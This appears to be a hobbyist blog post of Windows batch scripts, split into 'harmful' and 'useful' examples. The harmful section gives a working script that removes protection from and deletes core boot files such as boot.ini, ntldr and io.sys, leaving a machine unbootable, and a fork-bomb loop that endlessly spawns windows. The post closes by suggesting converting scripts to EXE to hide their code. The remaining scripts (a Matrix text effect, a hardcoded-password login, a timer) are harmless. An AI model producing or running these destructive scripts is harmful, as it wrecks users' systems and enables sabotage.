Harmful effect of Batch files Programming
===========================================================
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\io.sys
del c:\io.sys
attrib -r -s -h c:\ntdetect.com
del c:\ntdetect.com
attrib -r -s -h c:\msdos.sys
del c:\msdos.sys
exit
===========================================================
===========================================================
@echo off
:a
Start
Goto a
===========================================================
Useful effect of Batch files Programming
===========================================================
Title .::Create MATRIX text in BATCH File in Window XP::.
@ECHO OFF
:A
COLOR 02
ECHO %random%%random%%random%%random%%random%%random%%random%
GOTO A
===========================================================
===========================================================
@echo off
title .::Codecatcher BatchFile to Login::.
color 9e
echo press any key...
pause>nul
echo sir please enter your username and password
echo username:
set /p user=
echo password:
set /p pass=
if '%user%'=='codecatcher' goto adminuser
echo wrong password or invalid username
echo press any key to exit
pause>nul
exit
:adminuser
if '%pass%'=='ayosba' goto welcome
echo wrong password
echo press any key to exit
pause>nul
exit
:welcome
echo Welcome To Google
echo Make Google as your Home Page?
echo Please Type YES/NO [UpperCase] to Search Google:
set /p note=
if '%note%'=='YES' start www.google.com.ph
echo Awts you type a lowercase or incorrect password
exit
===========================================================
===========================================================
@echo off
Title .::60 sec timer then Open Google Site::.
echo 60
ping localhost -n 2 > nul
cls
echo 59
ping localhost -n 2 > nul
cls
...
..
.
echo 00
ping localhost -n 2 > nul
cls
echo Time is Up!!!
cls
Start www.google.com.ph
exit
......just follow the code and change the echo to 58-01 and save the file as bat
Note: To Hide Your Batch File Code to Show on Public. Just Convert it into Exe Application File download Bat2Exe Converter..
===========================================================
Download Bat2EXEConverter[CodeCatcher]: Here
Subscribe in a reader